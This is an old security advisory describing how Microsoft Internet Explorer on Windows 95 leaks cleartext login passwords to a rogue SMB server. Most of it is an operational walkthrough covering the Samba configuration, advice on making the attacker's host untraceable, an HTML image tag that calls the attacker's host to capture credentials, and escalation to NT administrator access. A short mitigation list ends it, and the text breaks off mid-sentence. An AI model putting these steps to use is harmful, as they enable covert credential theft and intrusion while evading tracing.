COMMAND                                            SOURCE: 


  Win '95


    There is new security hole to be exploited with MSIE.  Details on:

    It  is  possible  from  anywhere  on  the  Internet  to obtain the
    cleartext Windows 95 login password from a Windows 95 computer  on
    a network  connected directly  to the  Internet given  only the IP
    address and the workgroup and  leave no trace of your  actions. It
    is untested and may work with Windows For Workgroups as well.

    There  has  been  recent  discussion  on  security  mailing  lists
    concerning the  fact that  Microsoft Internet  Explorer running on
    Windows  NT  will  automatically  try  to  log  in to a remote SMB
    server (file  server) without  prompting the  user or  without the
    user's knowledge. By design, the NT machine will transmit to  this
    remote server  the encrypted  password and  username of  the user.
    This is documented  by Aaron Spangler.  The caveats with  this are
    that the passwords are encrypted and that in many cases people  do
    not use WWW  browsers from NT  servers, but rather  from computers
    running Windows 95.

    It has been explained that this same exploit does not work against
    Windows 95  because Windows  95 is  only capable  of accessing SMB
    shares (file sharing) if they are:

    * Connected to the same subnet.
    * In the Windows 95 computer's LMHOSTS file on startup
    * Announced to the Windows 95 computer by a Master Browser

    It is this third and  final condition that can be  taken advantage
    of to obtain  the cleartext password  and username of  any Windows
    95 user who  uses Microsoft Internet  Explorer. Even careless  use
    of Microsoft  Network Neighborhood  can exploit  this hole without
    the  requirement  for  Internet  Explorer  The  requirements   are
    knowledge of the user's IP  address, workgroup name and that  they
    access a  hostile web  page. The  first two  are not  difficult to
    obtain and the third does not  have to be an obscure page.  In the
    last 6 months sites such as the CIA have been broken into. All  it
    would require is that one un-noticeable line be added to the  home
    page.   Since  the  viewable  content  of  the  page  has not been
    altered, such a change can go unnoticed for a long time.

    Exploit involves  the use  of the  Unix SMB  implementation called
    Samba.   There are  no source  changes required,  but it should be
    compiled  with  -DDEBUG_PASSWORD.   Samba  has  an  option  in the
    smb.cfg file called remote announce. This allows you to specify  a
    network address (host or  broadcast) and workgroup name  to inform
    about your existence.  I have configured  the [global] section  of
    the smb.conf file like this:

	workgroup = EXPLOIT
	preferred master = yes
	domain master = yes
	security = user
	debug level = 100
	remote announce =

    The only thing that must  be changed is the remote  announce line.
    The rest works as-is. A simple share must then be set up such as:

       path = /tmp
       public = no
       browsable = yes

    Nothing needs to be in the  directory as nobody will ever see  it.
    For the sake of untractability, change your hostname to  something
    that does  not exist,  but ensure  to create  an entry  for it  in
    /etc/hosts.  This makes  your host untraceable unless  the network
    you are connecting to monitors network traffic.

    Run smbd. If you  are running it from  inetd, the process must  at
    least  start  itself  in  order  to  send  the  broadcast.   Using
    smbclient to  browse yourself  is enough  for this.  The broadcast
    gets sent regardless of what smbd was started for.

    At this  point if  anyone on  the target  network were  to look at
    their  Windows  95  Network  Neighborhood  they would see the host
    "EXPLOIT". The host is now  vulnerable to your attack. While  this
    step may seem a bit obscure and complicated, the truth is that  it
    is very  simple. I  won't get  into details  here, but the methods
    for  obtaining  the  workgroup  name  are  easy to use and readily
    available.  Finding a target network that has not protected  ports
    137 and 139 is  also not so hard.  Once you've done that,  setting
    everything up to here takes a very short ammount of time.

    The final and easiest step is to include the following in any html
    file a user on this network accesses:

	<img src=file://\\exploit/exploit/t.gif>

    You will now see in your Samba log a line such as this:

	checking user=[user] pass=[INNOCENT]

    The  password  of  any  Internet-connected  user running Microsoft
    Internet Explorer  on Windows  95 obtained  be found  in cleartext
    provided that their network  administrator has not protected  them
    from accessing external SMB servers by closing ports 139 and  137.
    If  you  have  obtained  the  password  of  a user of a Windows NT
    server, you can now take the username, password and workgroup  and
    log  into  that  Windows  NT  server.  Your  true  hostname and IP
    address are  not stored  in the  html file  and I  am aware  of no
    logging of hosts that enter the browse list.  This means that  you
    are  not  traceable,  even  though  they  are  connecting  to your
    machine.  If you  are lucky, you found  the Windows 95 machine  of
    the NT administrator and have little work left in order to  access
    the NT server with administrator privileges.

    For  demonstration  check  the  original  sote  (the  one  above).
    Discovery  by   Steve  Birnbaum   with  help   from  Mark   Gazit.
    Additional support from Yacov Drori and Roman Lasker.




    Well,  try  something  of  following   before  MS  come  up   with

	* Use Netscape
	* Use  a proxy  firewall or  packet filter  to close off ports
	  137 and  139 from  external access  to your  network, though
	  this still leaves you at risk from internal attacks.
	* Ask Microsoft to rewrite Windows to not send passwords by